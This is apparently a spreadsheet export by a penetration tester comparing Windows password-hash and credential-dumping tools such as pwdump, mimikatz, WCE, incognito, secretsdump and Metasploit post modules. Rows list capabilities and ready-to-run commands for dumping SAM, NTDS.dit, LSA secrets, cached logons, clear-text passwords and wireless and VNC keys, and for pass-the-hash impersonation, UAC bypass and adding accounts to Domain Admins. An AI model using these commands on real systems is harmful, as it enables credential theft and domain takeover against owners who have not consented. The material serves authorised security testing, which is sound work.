Password hashes dump tools
 Share
The version of the browser you are using is no longer supported. Please upgrade to a supported browser.Dismiss

 
View only
 
 
Still loading...
ABCDEFGHIJKLMNOPQRSTUVWXYZ
1
ToolCommand lineGUILocalRemoteSAMNTDS.ditPassword historyLSA secretsCredential managerProtected storageAutologinLogon sessionsClear-text logon sessionsSession tokensCached domain logon informationWirelessVNCCertificates and keys32-bit64-bitWindows XP/2003Windows Vista/2008/7RDP session isolationNotesCommands
2
Cain & AbelNoYesYesYes. See notesYes (in-memory and from reg files)Yes (in-memory)YesYes (in-memory and from reg files)Yes locally
No remotely
Yes locally
No remotely
Yes (via LSA secrets)NoNoNoYes (in-memory and from reg files)YesYesNoYesYesYesYesYesTo dump SAM and LSA secrets remotely, use Cain to connect to the target machine as an administrative user, right-click on Services, then "Install Abel", refresh your Network tab and expand the target entry, then expand the Abel sub-entry and either dump SAM and password history from "Hashes" entry or LSA secrets from the entry below.-
3
pwdump2YesNoYesNoYes (in-memory)Yes (in-memory)NoNoNoNoNoNoNoNoNoNoNoNoYesNo. See notesYesNoYes. See notesOn 64-bit architecture it fails and displays "CreateRemoteThread failed: 5".
On remote logon sessions via RDP it fails and displays "CreateRemoteThread failed: 8", run as SYSTEM to avoid this from happening.
C:\>pwdump2.exe [lsass.exe PID]
4
pwdump6Yes. See notesNoYesYesYes (in-memory)Yes (in-memory)YesNoNoNoNoNoNoNoNoNoNoNoYesYesYesYesYesMake sure you launch it from C:\ and not from a network shared folder.C:\>PwDump.exe -o pwdump6.log 127.0.0.1
C:\>PwDump.exe -x -o pwdump6.log 127.0.0.1 # 64-bit
C:\>PwDump.exe -o pwdump6.log -u Administrator -p <password> -s ADMIN$ 192.168.0.1 # remote, one IP
5
pwdump7YesNoYesNoYes (from registry files). See notesNoNoNoNoNoNoNoNoNoNoNoNoNoYesYesYesYes. See notesYesOn domain controllers use in-memory tools or extract from ntds.dit file as SAM contains no domain users, just the "restore mode" administrator password of the DCC:\>PwDump7.exe # online SAM and SYSTEM registry files
C:\>PwDump7.exe -s <samfile> <systemfile> # offline SAM and SYSTEM registry files
6
Quarks PwDumpYesNoYesNoYes (from registry files). See notesYes (from NTDS.dit)YesNoNoNoNoNoNoNoYes (from registry files)NoNoNoYesYesYesYesYes-C:\>quarks-pwdump.exe -dhl -hist -o hashes.txt # dump local SAM
C:\>quarks-pwdump.exe -dhdc -o cached.txt # dump cached domain logon information
C:\>quarks-pwdump.exe -dhd -hist -nt C:\Windows\NTDS\ntds.dit -o hashes.txt # dump domain password hashes
7
PowerDumpYesNoYesNoYes (from registry files). See notesNoNoNoNoNoNoNoNoNoNoNoNoNoYesYesYesYes. See notesYesOn domain controllers use in-memory tools or extract from ntds.dit file as SAM contains no domain users, just the "restore mode" administrator password of the DCRun as SYSTEM:
C:\>powershell Set-ExecutionPolicy Unrestricted
C:\>powershell C:\path\of\powerdump.ps1
8
fgdumpYesNoYesYesYes (in-memory)Yes (?)YesNoNoUnreliable. See notesNoNoNoNoYes (in memory). See notesNoNoNoYesYesYesYesYesTo dump the cached domain creds, it embeds cachedump.exe and on 64-bit architecture it fails and displays "ERROR Unable to LoadLibrary lsasrv.dll (code 126)".
The dumping of protected storage fails and displays "fgexec CallNamedPipe failed with error 2" regardless of the architecture.
C:\>fgdump.exe -s -r -v -v -k -l fgdump.log -T 3 -O 32
C:\>fgdump.exe -s -r -v -v -k -l fgdump.log -T 3 -O 64 # 64-bit
C:\>fgdump.exe -s -r -v -v -k -l fgdump.log -T 3 -O 32 -h 192.168.0.1 -u Administrator -p <password> # remote, one IP
C:\>fgdump.exe -s -r -v -v -k -l fgdump.log -T 3 -O 32 -f ips.txt -u Administrator -p <password> # remote, IP list
C:\>fgdump.exe -s -r -v -v -k -l fgdump.log -T 3 -O 32 -H ips_creds.txt # remote, IP and creds list
9
PWDumpXYesNoYesYesYes (in-memory)Yes (in-memory)YesYes (in-memory)NoNoYes (via LSA secrets)NoNoNoYes (in-memory)NoNoNoYesNo. See notesYesYes (?)YesOn 64-bit architecture it fails and displays "ERROR! Cannot start PWDumpX service on host".C:\>PWDumpX.exe -clph 127.0.0.1 + + # use current logon session credentials
C:\>PWDumpX.exe -clph 127.0.0.1 Administrator <password>
C:\>PWDumpX.exe -clph ips.txt + + # remote, IP list
10
gsecdumpYesNoYesNoYes (in-memory). See notesYes (in-memory)NoYes (in-memory)NoNoYes (via LSA secrets)Yes (dump). See notesNoNoNoYesNoNoYesYes. See notesYesYesYes. See notesgsecdump is excellent in dumping LSA secrets regardless of the Windows version and architecture.
Since version 2.0b5 it is also reliable to dump SAM/AD hashes as well as logon sessions regardless of the Windows version and architecture.
On remote logon sessions via RDP it fails and displays "error [6] in GetExitCodeThread: The handle is invalid" or "error [8] in CreateRemoteThread: Not enough storage is available to process this command", run as SYSTEM to avoid this from happening.
C:\>gsecdump.exe -a
11
secretsdumpYesNoYesYesYes (from registry files)Yes (from NTDS.dit)YesYes (from registry files)NoNoNoNoNoNoYes (from registry files)NoNoNoYesYesYesYes--$ secretsdump.py -debug -outputfile target_ip DOMAIN/Administrator:password@192.168.0.1
$ secretsdump.py -debug -outputfile target_ip -hashes LMhash:NThash DOMAIN/Administrator@192.168.0.1
$ secretsdump.py -debug -outputfile target_ip -system SYSTEM -security SECURITY -sam SAM -ntds ntds.dit LOCAL
12
carrotYes. See notesNoYesNoYes (from registry files). See notesYes (?)NoNoUnreliable. See notesYesYesNoNoNoNoYesYesNoYesYesYesYesYesIt is a bundle of the other tools including the NirSoft ones (netpass, WirelessKetView, etc).
Prefer netpass to dump the credential manager.
To dump SAM hashes it uses pwdump7.
C:\>carrot.exe /nouac # as SYSTEM, disable UAC
C:\>carrot.exe /32 /pwdump /np /ps /wlan /vnc # as user or Administrator
C:\>carrot.exe /64 /pwdump /np /ps /wlan /vnc # as user or Administrator, 64-bit
13
Metasploit smart_hashdump (post module)YesNoYesYesYes (in-memory and from reg files)Yes (in-memory)NoNoNoNoNoNoNoNoNoNoNoNoYesYesYesYes-When run on domain controllers, it will use the in-memory technique to dump domain users' credentials. Vice versa when the target is a workstation it will dump the hashes from SAM file instead.run post/windows/gather/smart_hashdump GETSYSTEM=true
14
Metasploit hashdump (post module)YesNoYesYesYes (from registry files). See notesNoNoNoNoNoNoNoNoNoNoNoNoNoYesYesYesYes-On domain controllers, prefer Metasploit smart_hashdump post modules because SAM file does not contain domain users' information.run post/windows/gather/hashdump
15
Metasploit hashdump (script)YesNoYesYesYes (from registry files). See notesNoNoNoNoNoNoNoNoNoNoNoNoNoYesYesYesYes-On domain controllers, prefer Metasploit smart_hashdump post modules because SAM file does not contain domain users' information.run hashdump
16
Metasploit hashdump (command)YesNoYesYesYes (in-memory). See notesYes (in-memory)NoNoNoNoNoNoNoNoNoNoNoNoYesUnreliable. See notesYesYes-Prefer to run as SYSTEM.
On 64-bit architecture running as SYSTEM within a shell with UAC bypassed it fails and displays "priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect".
run post/windows/escalate/bypassuac
Background session <X>? [y/N] y
msf exploit(handler) > sessions -l
msf exploit(handler) > sessions -i <X>+1 # these steps are recommended against Windows Vista and Windows 7 to dump SAM hashes from memory
hashdump
17
mimikatzYesNoYesNoYes (in-memory and from reg files)Yes (in-memory)YesYes (in-memory)Unreliable. See notesNoYes (via LSA secrets)Yes (dump and impersonate)Yes. See notesNoNoNoNoYes (exportable and
non-exportable)
YesYesYesYesYesFor details on @getLogonPasswords command refer too:
http://blog.gentilkiwi.com/securite/pass-the-pass
http://blog.gentilkiwi.com/securite/re-pass-the-pass
Run as any user:
mimikatz # samdump::hashes <systemfile> <samfile> # dump SAM hashes from registry file

Run as SYSTEM (psexec.exe -s cmd.exe) or alternatively assign yourself SeDebugPrivilege with "privilege::debug":
mimikatz # inject::process lsass.exe sekurlsa.dll # required to dump hashes from memory and other operations
mimikatz # @getLocalAccounts # dump SAM hashes from memory
mimikatz # @getSecrets # dump LSA secrets
mimikatz # @getLogonSessions # dump logon sessions
mimikatz # @getLogonPasswords # dump clear-text passwords for all sessions (console, RDP, services)
mimikatz # crypto::patchcng

Run as user or Administrator:
mimikatz # divers::secrets # dump a subset of credential manager ('LegacyGeneric' entries only)
mimikatz # crypto::patchcapi
mimikatz # crypto::exportCertificates # dump user's DER and PFX certificates
mimikatz # crypto::exportKeys # dump user's PVK keys
18
pwhistYesNoYesNoYes (in-memory and from reg files)Yes (in-memory)YesNoNoNoNoNoNoNoNoNoNoNoYesYesYesYesYes-Run as SYSTEM (psexec.exe -s cmd.exe):
C:\>pwhist.exe # in-memory technique
C:\>pwhist.exe -s <systemfile> <samfile> # offline SAM and SYSTEM registry files
19
bkhive / samdump2YesNoYesNoYes (from registry files)NoNoNoNoNoNoNoNoNoNoNoNoNoYesYesYesYes-Dump SAM hashes with physical access to the system# mkdir -p /mnt/sda1
# mount /dev/sda1 /mnt/sda1
# bkhive /mnt/sda1/Windows/System32/config/SYSTEM /tmp/saved-syskey.txt
# samdump2 /mnt/sda1/Windows/System32/config/SAM /tmp/saved-syskey.txt > /tmp/hashes.txt
20
creddump by moyixYesNoYesNoYes (from registry files)NoYesYes (from registry files).
See notes
NoNoYes (via LSA secrets)NoNoNoYes (from registry files)NoNoNoYesYesYesYes-To dump LSA secrets of Windows Vista and above versions, use the enhanced version of creddump part of ntds_dump_hash - the tool is called lsadumpw2k8.py$ ./pwdump.py
usage: ./pwdump.py <system hive> <SAM hive>
$ ./cachedump.py
usage: ./cachedump.py <system hive> <security hive>
$ ./lsadump.py
usage: ./lsadump.py <system hive> <security hive>
21
ntds_dump_hashYesNoYesNoNoYes (from NTDS.dit)YesYes (from registry files)NoNoYes (via LSA secrets)NoNoNoYes (from registry files)NoNoNoYesYesYesYes-Includes an updated version of moyix's creddump$ wget http://csababarta.com/downloads/ntds_dump_hash.zip
$ unzip ntds_dump_hash.zip
$ cd libesedb
$ ./configure && make
$ cd esedbtools
$ ./esedbdumphash -v -t /tmp/output <ntds.dit file>
$ ls -1 /tmp/output.export/
datatable
$ cd ../../creddump/
$ chmod +x *.py
$ ./dsuserinfo.py /tmp/output.export/datatable
$ ./dsdump.py <SYSTEM file> /tmp/output.export/datatable --include-locked --include-disabled > domain_hashes.txt
22
NTDSXtractYesNoYesNoNoYes (from NTDS.dit)YesNoNoNoNoNoNoNoNoNoNoYes (?)YesYesYesYes-NTDS.DIT ForensicsDownload and install libesedb from http://sourceforge.net/projects/libesedb/files/libesedb-alpha/:
$ tar xvfz libesedb-alpha-20111210.tar.gz
$ cd libesedb-20111210/
$ ./configure
$ make
# make install # as root
$ esedbexport -l /tmp/esedbexport.log -t /tmp/ntds.dit <ntds.dit>
$ ls -1 /tmp/ntds.dit.export/
datatable.3
hiddentable.4
link_table.5
[...]
$ wget http://csababarta.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip
$ unzip ntdsxtract_v1_0.zip
$ cd NTDSXtract\ 1.0
$ python dsusers.py /tmp/ntds.dit.export/datatable.3 /tmp/ntds.dit.export/link_table.5 --passwordhashes <SYSTEM file> --passwordhistory <SYSTEM file> --certificates --supplcreds <SYSTEM file> --membership > /tmp/ntds.dit.output
$ wget https://raw.github.com/inquisb/miscellaneous/master/ntdstopwdump.py
$ python ntdstopwdump.py /tmp/ntds.dit.output
23
passcape Windows Password RecoveryNoYes. See notesYesYesYes (in-memory and from reg files)Yes (from NTDS.dit)YesYes (in-memory?)NoNoYes (via LSA secrets)NoNoNoYes (in-memory? and from reg files)NoNoNoYesYesYesYesYesThe trial version is limited in functionalities, however it can dump SAM hashes from registry files and in-memory locally.
The lifetime personal license light edition costs $65.
-
24
pdbedit on Unix/LinuxYesNoYesNoNoYes (domain users, from Samba's config)YesNoNoNoNoNoNoNoNoNoNoNoYesYesNoNo-Dumping Samba hashes# pdbedit -L -w -s /etc/samba/smb.conf | perl -e 'while (<>) { @smbpasswd = split(/:/, $_); print $smbpasswd[0] . ":" . $smbpasswd[1] . ":" . (($smbpasswd[2] eq "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") ? "NO PASSWORD*********************" : $smbpasswd[2]) . ":" . (($smbpasswd[3] eq "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") ? "NO PASSWORD*********************" : $smbpasswd[3]) . ":::\n"; }'
25
passcape Network Password RecoveryNoYes. See notesYesNoNoNoNoNoYesNoNoNoNoNoYes (from registry files)YesNoNoYesYesYesYesYesThe trial version can dump all, but displays only the first three characters of dumped passwords.
The lifetime personal license costs $32.
-
26
lsadump2YesNoYesNoNoNoNoYes (in memory)NoNoYes (via LSA secrets)NoNoNoNoNoNoNoYesNo. See notesYesNo (?)Yes. See notesOn 64-bit architecture it fails and displays "CreateRemoteThread failed: 5".
On remote logon sessions via RDP it fails and displays "CreateRemoteThread failed: 8", run as SYSTEM to avoid this from happening.
C:\>lsadump2.exe
27
LSASecretsDumpYesNoYesNoNoNoNoUnreliable. See notesNoNoYes (via LSA secrets)NoNoNoNoNoNoNoYesYesYesYesYes. See notesIt has always failed to dump all LSA secrets of services running as legitimate Windows local users regardless of the architecture on both Windows 7 and Windows Server 2003 SP2.
On remote logon sessions via RDP it fails, run as SYSTEM to avoid this from happening.
C:\>LSASecretsDump.exe -empty
C:\>LSASecretsDump-x64.exe -empty # 64-bit
28
LSASecretsViewNoYesYesNoNoNoNoUnreliable. See notesNoNoYes (via LSA secrets)NoNoNoNoNoNoNoYesYesYesYesYes. See notesAs per LSASecretsDump, it has always failed to dump all LSA secrets.
On remote logon sessions via RDP it fails, run as SYSTEM to avoid this from happening.
-
29
Network Password Recovery (netpass)YesYesYesNoNoNoNoNoYesNoYes (via LSA secrets)NoNoNoNoNoNoNoYesYes. See notesYesYesYesMake sure you run the 64-bit version of this tool on 64-bit architecture otherwise no entries will be dumped.C:\>netpass.exe /scomma netpass.csv
30
Metasploit gather/credentials/enum_cred_store (post module)YesNoYesYesNoNoNoNoUnreliable. See notesNoNoNoNoNoNoNoNoNoYesYesYesYes-Prefer netpass and Cain & Abel to this Metasploit post-exploitation module. It found all entries but it dumped 2 out of 7 entries and the loot output file is not easily readable.run post/windows/gather/credentials/enum_cred_store
31
creddump by oxid.itYes. See notesNoYesNoNoNoNoNoUnreliable. See notesNoNoNoNoNoNoNoNoNoYesNo. See notesYesNoYesAvoid this tool. It crashes the lsass.exe process and the system gets restarted automatically. Use Cain & Abel by the same author or netpass instead.
On 64-bit architecture it fails and displays "CreateRemoteThread failed: 5".
C:\>creddump.exe
32
Protected Storage PassView (pspv)YesYesYesNoNoNoNoNoNoYesNoNoNoNoNoNoNoNoYesYesYesYesYes-C:\>pspv.exe /stab pspv.txt
33
Metasploit gather/credentials/windows_autologin (post module)YesNoYesYesNoNoNoNoNoNoYesNoNoNoNoNoNoNoYesYesYesYes--run post/windows/gather/credentials/windows_autologin
34
Windows Credentials Editor (WCE)YesNoYesNoNoNoNoNoNoNoNoYes (dump and impersonate)Yes. See notesNoNoNoNoNoYesYes. See notesYesYesYesWith version 1.3, WCE is also able to dump clear-text passwords for logon sessions, like mimikatz does (http://hexale.blogspot.com/2012/03/wce-v13beta-32bit-released.html).
Make sure you run the 64-bit version of this tool on 64-bit architecture otherwise it won't work.
C:\>wce.exe -l -v # dump available logon sessions
C:\>wce.exe -r3 # dump available logon sessions every 3 secs
C:\>wce.exe -w # dump clear-text passwords for logon sessions

C:\>wce.exe -s <user>:<domain>:<LM hash>:<NT hash> -c cmd.exe # impersonate a logon session

C:\>wce.exe -g <password> # generate LM and NT hash of <password>
35
Pass-The-Hash Toolkit (PTH)YesNoYesNoNoNoNoNoNoNoNoYes (dump and impersonate)NoNoNoNoNoNoYesNo. See notesYesNo. See notesYes. See notesThis tool is deprecated and does not work on 64-bit architecture and recent versions of Windows. Use WCE instead.
On remote logon sessions via RDP it fails and displays "Error in InjectDllAndCallFunction", run as SYSTEM to avoid this from happening.
C:\>whosthere-alt.exe -D # dump available logon sessions
C:\>iam-alt.exe -h <user>:<domain>:<LM hash>:<NT hash> -r cmd.exe # impersonate a logon session

C:\>genhash.exe <password> # generate LM and NT hash of <password>
36
lslsassYesNoYesNoNoNoNoNoNoNoNoYes (dump)NoNoNoNoNoNoYesYesNo. See notesYesYesMake sure you run the 64-bit version of this tool on 64-bit architecture otherwise no entries will be dumped.
On older Windows versions use mimikatz, msvctl, WCE or PTH.
C:\>lslsass.exe go
37
RunhAshYesNoYesNoNoNoNoNoNoNoNoYes (impersonate)NoNoNoNoNoNoYesYesNo. See notesYesYesMake sure you run the 64-bit version of this tool on 64-bit architecture otherwise it won't work.
On older Windows versions use mimikatz, msvctl, WCE or PTH.
C:\>runhash.exe <domain>\<user>::<LM hash>:<NT hash>::: cmd.exe
38
msvctlYesNoYesNoNoNoNoNoNoNoNoYes (dump and impersonate)NoNoNoNoNoNoYesNo. See notesYesNoYes. See notesOn 64-bit architecture it fails and displays "error: code: -10". Use RunhAsh, mimikatz or WCE instead.
On remote logon sessions via RDP it fails and displays "error: code: -10", run as SYSTEM to avoid this from happening.
C:\>msvctl.exe list
C:\>msvctl.exe <domain>\<user> <LM hash>:<NT hash> run cmd.exe
39
incognitoYesNoYesYesNoNoNoNoNoNoNoNoNoYes (list and impersonate)NoNoNoNoYesUnreliable. See notesYesUnreliable. See notesYesThis tool is not officially supported on 64-bit architecture and recent versions of Windows. Run it a few times to list all available tokens and impersonate properly.Run as an administrative user:
C:\>incognito.exe -h 127.0.0.1 list_tokens -u # list available user tokens
C:\>incognito.exe -h 127.0.0.1 list_tokens -g # list available group tokens
C:\>incognito.exe -h 127.0.0.1 execute -c "NT AUTHORITY\SYSTEM" cmd.exe # impersonate Local System
C:\>incognito.exe -h 127.0.0.1 add_user -h <domaincontrollerip> youruser yourpassword # add a domain user
C:\>incognito.exe -h 127.0.0.1 add_group_user -h <domaincontrollerip> "Domain Admins" youruser # assign domain admin to user
C:\>incognito.exe -h 127.0.0.1 add_group_user -h <domaincontrollerip> "Enterprise Admins" youruser # assign ent admin to user
C:\>incognito.exe -h 192.168.0.1 list_tokens -u # remote, list available user tokens
C:\>incognito.exe -h 192.168.0.1 list_tokens -g # remote, list available group tokens
C:\>incognito.exe -h 192.168.0.1 execute -c "NT AUTHORITY\SYSTEM" cmd.exe # impersonate Local System
C:\>incognito.exe -h 192.168.0.1 add_user -h <domaincontrollerip> <user> <password> # remote, add a domain user
C:\>incognito.exe -h 192.168.0.1 add_group_user -h <domaincontrollerip> "Domain Admins" <user> # remote, assign domain admin to user
C:\>incognito.exe -h 192.168.0.1 add_group_user -h <domaincontrollerip> "Enterprise Admins" <user> # remote, assign ent admin to user

Run as SYSTEM (psexec.exe -s cmd.exe):
C:\>incognito.exe list_tokens -u # list available user tokens
C:\>incognito.exe list_tokens -g # list available group tokens
C:\>incognito.exe execute -c "<domain|workgroup>\user" cmd.exe # impersonate a <domain|workgroup> user
40
find_tokenYesNoYesYesNoNoNoNoNoNoNoNoNoYes (list)NoNoNoNoYesUnreliable. See notesYesUnreliable. See notesYesThis tool is not officially supported on 64-bit architecture and recent versions of Windows. Run it a few times to list all available tokens.Run as an administrator user:
C:\>find_token.exe 127.0.0.1
C:\>find_token.exe 192.168.0.1 # remote, one IP
C:\>find_token.exe -f ips.txt # remote, IP list
C:\>find_token.exe 192.168.0.1 Administrator <password> # remote, one IP
C:\>find_token.exe -f ips.txt Administrator <password> # remote, IP list

Run as SYSTEM (psexec.exe -s cmd.exe):
C:\>find_token.exe 127.0.0.1
41
cachedumpYesNoYesNoNoNoNoNoNoNoNoNoNoNoYes (in-memory)NoNoNoYesNo. See notesYesNo (?)YesOn 64-bit architecture it fails and displays "ERROR Unable to LoadLibrary lsasrv.dll (code 126)".C:\>cachedump.exe -v
42
Metasploit gather/cachedump (post module)YesNoYesYesNoNoNoNoNoNoNoNoNoNoYes (from registry files)NoNoNoYesYesYesYes--run post/windows/gather/cachedump
43
WirelessKeyViewYesYesYesNoNoNoNoNoNoNoNoNoNoNoNoYesNoNoYesYes. See notesYesYesYesMake sure you run the 64-bit version of this tool on 64-bit architecture otherwise no entries will be dumped.C:\>WirelessKeyView.exe /codeinject 1 /stab WirelessKeyView_tab.txt
44
Metasploit wlan/wlan_profile (post module)YesNoYesYesNoNoNoNoNoNoNoNoNoNoNoYesNoNoYesYesYesYes--run post/windows/escalate/bypassuac
Background session <X>? [y/N] y
msf exploit(handler) > sessions -l
msf exploit(handler) > sessions -i <X>+1 # these steps are recommended against Windows Vista and Windows 7 to dump the clear-text wireless password/passphrase
run post/windows/wlan/wlan_profile
45
vncpwdumpYesNoYesNoNoNoNoNoNoNoNoNoNoNoNoNoYesNoYesYesYesYesYes-C:\>vncpwdump.exe -c -s -d
46
VNCPassViewYesYesYesNoNoNoNoNoNoNoNoNoNoNoNoNoYesNoYesYesYesYesYes-C:\>VNCPassView.exe /stab vncpassview.txt
47
Metasploit gather/vnc (post module)YesNoYesYesNoNoNoNoNoNoNoNoNoNoNoNoYesNoYesYesYesYes--run post/windows/gather/credentials/vnc
48
Metasploit getvncpw (script)YesNoYesYesNoNoNoNoNoNoNoNoNoNoNoNoYesNoYesYesYesYes--run getvncpw
49
50
by Bernardo Damele A. G.
51
http://bernardodamele.blogspot.com/search/label/dump
Loading...
 
 
 
Tools